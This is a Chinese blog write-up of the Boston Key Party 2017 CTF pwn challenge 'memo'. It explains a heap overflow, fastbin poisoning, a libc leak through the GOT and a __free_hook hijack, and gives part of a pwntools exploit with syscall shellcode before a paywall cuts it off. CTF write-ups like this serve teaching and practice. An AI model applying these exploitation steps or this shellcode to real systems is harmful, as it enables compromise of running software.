bosten key party 2017 memo writeup

最新推荐文章于 2022-01-29 19:15:00 发布
最新推荐文章于 2022-01-29 19:15:00 发布
阅读量1k 收藏
点赞数 2
分类专栏: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/76218071
版权
本文是关于2017年Boston Key Party CTF比赛中pwn类题目'Memo'的解决方案。作者首先介绍了题目的背景和逻辑,包括程序的限制和功能。然后,详细分析了程序中存在的漏洞,特别是leave message功能的缓冲区溢出问题。通过溢出,可以修改内存布局,控制__free_hook并利用隐藏函数执行shellcode。最后,提供了exploit代码。
摘要由CSDN通过智能技术生成

memo

题目

https://github.com/ctfs/write-ups-2017/tree/master/boston-key-party-2017/pwn/memo-300

分析

题目有些生硬,很多地方都不太能说通,不过就是练习一下,就当刷水题了。

逻辑

  1. setvbuf等基本操作,以及使用prctl设置了no new privs,所以无法新建进程
  2. 输入用户密码,密码可以不写,全局变量name和password分别保留用户和密码,分别0x20大小
  3. 之后进入主要逻辑一共6个功能
    i. leave message 涉及到两个全局变量,size和memo,memo紧跟在size之后,size紧跟在password之后,size大小0x10,memo大小0x20。 size是int类型数组,一共有4个int,每一个表示0到3个message的大小。 memo一共有4个指针,每一个表示message的具体位置。 leave message有两种情况,一个是0x20大小以内,直接malloc该大小,并且在size数组中保存,存进memo里,另一个是0x20大小以上,malloc 0x20大小,然后使用read读取size大小,之后全局变量index保存为这次创建的index。
    ii. edit message,更改全局变量memo中全局变量index所在指针指向位置的内容,大小为size中index的值
    iii. view memo 查看某个index的memo内容
    vi. delete memo 删除某个index的memo内容,直接free,并且将memo数组中该位置设置为0,删除前先判断
    v. change password 更改密码内容

开启的保护主要是 NX, FULL RELRO, 没有开启PIE

漏洞

  1. leave message位置,如果大于0x20,read时候读取的还是size,size此时大于0x20,存在溢出。
  2. 有一个隐藏函数,位于0x400b47,会执行输入的内容

利用分析

溢出的自由度比较大,利用也比较简单。
大概步骤是
1. password设置最后位置为0x31,由于password和size紧邻,用来通过fastbin 分配的check
2. 利用溢出,修改fd指针到password写入0x31的位置,然后分配出指向size位置的chunk
3. 修改memo位置的指针,指向任意一个GOT表中的指针,然后利用view来获取地址,得到libc基地址
4. 再次修改memo位置指针,指向__free_hook,然后通过edit来修改__free_hook指向隐藏函数
5. 通过shellcode完成open read 和write得到flag

题目比较简单,我就直接给exp了

exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

DEBUG = 1
GDB = 1
if DEBUG:
    p = process("./memo")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

shellcode = '''
mov rax, 0x2
mov rdi, 0x41410100
xor rsi, rsi
syscall
mov rdi, rax
mov rsi, 0x602000
mov rdx, 0x100
xor rax, rax
syscall
mov rax, 1
mov rdi, 1
mov rsi, 0x602000
mov rdx, 0x100
syscall
'''

def init_all(name, password):
    p.recvuntil('name:')
    p.sendline(name)
    p.recvuntil('(y/n)')
    if password is not None:
        p.sendline('y')
        p.recvuntil('Password:')
        p.sendline(password)
    else:
        p.sendline('n')


def leave_message(index, msg):
    p.recvuntil(
最低0.47元/天 解锁文章
Anciety
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UCI-Boston-House-Price-Prediction
04-07
【UCI波士顿房屋价格预测】是一个经典的机器学习数据集,源自1978年美国马萨诸塞州波士顿郊区的房地产数据。这个数据集被广泛用于教学和研究,因为它包含了一系列与房价相关的特征,可以帮助我们理解如何通过统计...
boston-key-party-2016-pwn-simple_calc 题解
lifanxin的博客
02-18 480
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年boston-key-party ctf的一道pwn题–simple_calc 检查样本信息:   只开启了NX保护,64位小端程序 漏洞定位 将样本拖入IDA进行分析时,会发现text段特别多,仔细分析后会发现很多函数都没有被使用,写完wp后,我猛然发现引用这么多看似无用的text段,其实是为了引用更多的gadget,方便后面ROP链的构造。好的,废话不多说,进行漏洞分析。 分析main函数,可以发现该样本是一个菜单题,先要
[BUUCTF-pwn] boston_key_party_2017_memo
weixin_52640415的博客
01-13 240
libc2.23,PIE未开,prctl禁用exec,有写溢出,ORW
[BUUCTF-pwn] shanghai2018_memo_server
weixin_52640415的博客
01-29 406
《一秒钟》,这估计是对这个题最好的解释了 程序模拟了一个http server 有add,count,echo,list共4个功能 add会先检查是否已存在,如果存在就修改count并标志置0,如果不存在就新建个0x10的管理块放入memo指针、count数、标志。再按memo的解码前长度建个数据块放传入的memo解码后的值 。这里使用strncpy的时候长度+1但由于块大小有限制不进过80,所以这一位无法利用 v1 = strtok(a1, "&");
bosten key party 2017 signed shell server writeup
jmp esp
07-27 695
signed shell server题目https://github.com/ctfs/write-ups-2017/tree/master/boston-key-party-2017/pwn/signed-shell-server-200分析先随便把玩一下,有两个功能,一个是sign,一个是execute,sign会给出一个命令的签名,然后execute给出命令,并给出签名,如果匹配成功就会使用
Boston Key Party CTF 2017: prudentialv2-50
公众号shadow sock7
06-03 1293
参考: https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md2015http://127.0.0.1/~caiqiqi/Boston_Key_Party_CTF_2017/prudentialv2-50/2015/?name[]=caiqiqi&
气候背景下冰川在博斯腾湖水量平衡中的作用 (2006年)
04-27
Effect of glaciers change to water balance of Lake Bosten under climatic backgrounds. *Journal of Lake Sciences*, 18(5), 484-489. 2. IPCC. (2014). *Climate Change 2014: Synthesis Report*. ...
基于完全遥感的湖泊湿地水文特征参数综合反演
03-14
文中提及的研究区域是位于86°19′~87°28′,41°46′~42°08′的某地区,涉及博斯腾湖(Bosten Lake)作为研究对象。研究过程中使用的ICESat-GLAS数据,时间为2000年至2002年,以及其他辅助数据源如TOPEX/...
rsa-buffet
m0_57291352的博客
11-01 315
rsa-buffet boston-key-party-2017 encrypt.py import random from Crypto.Cipher import AES,PKCS1_OAEP from Crypto.PublicKey import RSA def get_rand_bytes(length): return "".join([chr(random.randrange(256)) for i in range(length)]) def encrypt(public_key,
Writeup】Boston Key Party CTF 2015(部分题目)
企鹅学coding~
03-05 1万+
假期试着做了一下这场美国的CTF比赛,无奈题目看了一遍都没什么想法,只好等比赛结束再学习了。在这里总结一下通过此次比赛学到的姿势。 以下是六道php代码审计题目。 1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: level1 <?php require 'flag.p
CTF-Writeups:这些是我的CTF写作,以及我每个人的思考过程
05-23
为什么呢 我试图解释一些CTF挑战,希望您发现它们有用! :open_book: 一些链接... 在ctftime上的 :triangular_flag: 骄傲成员 :skull_and_crossbones: 骄傲成员 :bust_in_silhouette:
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6430
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
Secure Multi-party Computation
cnbird's blog
08-04 2027
https://en.wikipedia.org/wiki/Secure_multi-party_computation
2017 bctf boj writeup
jmp esp
05-22 980
BCTF 2017 BOJThis is a very interesting challenge for me. We were given a working oj on http://oj.bctf.xctf.org.cn, there was only a single classical problem a + b on it. I tried several times to play
linux kernel pwn学习之hijack prctl
seaaseesa的博客
03-06 1703
Hijack prctl Prctl是linux的一个函数,可以对进程、线程做一些设置,prctl内部通过虚表来调用对应的功能,如果我们劫持prctl的虚表,使它指向其他对我们有帮助的内核函数,比如call_usermodehelper函数,该函数执行一个用户传入的二进制文件,且以root权限执行,由此可以利用起来提权。 我们分析一下prctl源码,在linux/kernel/sys.c里,我...
ISCC2017部分题目wp
xuqi7
05-26 1万+
比赛网址:http://iscc.isclab.org.cn 小菜做的一些题
2016 Boston Key Party CTF bobs-hat RSA-attack
ACdream
05-19 356
知识点:Fermat分解首先使用openssl:openssl rsa -text -modulus -pubin &lt; almost_almost_almost_almost_there.pub得到第一关的n和e(这里也可以yafu.exe)然后使用Fermat分解,得到p和q,求得明文(即压缩包的密码)def isqrt(n): x = n y = (x + n // x) // ...
pwntools使用简介
热门推荐
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
ctf pwn 个人经验记录
jmp esp
05-22 8887
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
全国大学生信息安全竞赛writeup--珍贵资料(reverse200)
jmp esp
07-10 6958
描述你无意间得到了一些珍贵资料,可惜他们看起来不知道是什么,据说解开它可以得到flag神器。 tips:flag是flag{结果}附件描述:文件名:珍贵资料.zip校验(SHA1):4EF84DF5B34C12DED8EC3F603CFBC065251864B4思路一个压缩文件,打开解压得到unknown和unknown2,unknown2是一个apk,unknown不知道是啥。安装apk得到一个登
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值